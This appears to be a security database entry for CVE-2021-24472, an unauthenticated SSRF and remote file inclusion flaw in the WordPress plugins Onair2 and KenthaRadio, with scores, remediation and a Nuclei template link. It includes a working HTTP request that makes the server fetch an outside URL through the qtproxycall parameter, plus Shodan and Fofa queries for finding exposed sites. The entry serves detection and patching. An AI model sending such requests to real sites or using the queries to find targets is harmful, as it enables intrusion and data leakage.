🔙 목록으로 돌아가기

CVE-2021-24472: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery

TitleOnair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
AuthorSuman_Kar
SeverityCritical
ImpactRemote File Inclusion/Server-Side Request Forgery vulnerability allows an attacker to include arbitrary files or make requests to internal resources, leading to potential data leakage, unauthorized access.
RemediationUpdate Onair2 to version 3.9.9.2 or higher and KenthaRadio to version 2.0.2 or higher to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.8982
CVE IDCVE-2021-24472
CWE IDCWE-918
Shodan Queryhttp.html:/wp-content/plugins/qt-kentharadio
Fofa Querybody=/wp-content/plugins/qt-kentharadio
Tags cve2021 cve wordpress lfi ssrf wp wp-plugin wpscan qantumthemes vuln

🔍 Vulnerability Description

Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.

🌐 HTTP Request

GET /wp1/home-18/?qtproxycall=https://oast.me HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24472.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-24472.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A